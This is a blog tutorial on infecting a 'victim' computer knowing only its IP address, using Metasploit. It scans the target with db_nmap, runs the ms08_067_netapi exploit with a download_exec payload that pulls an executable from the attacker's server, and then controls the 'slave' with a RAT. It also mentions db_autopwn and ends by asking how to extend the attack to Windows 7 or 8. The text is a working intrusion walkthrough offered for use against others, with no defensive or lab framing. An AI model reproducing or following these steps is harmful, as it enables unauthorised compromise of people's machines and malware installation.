Header Ads

Tutorial - How to infect or hack a computer with only IP address:



First of all you need target IP of your victim.

Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.


Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Usage: This will show all targets by exploit]

Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options
[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]

Next Type set URL
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someone's Windows 7 or 8?
Waiting for your explanation! :)
Powered by Blogger.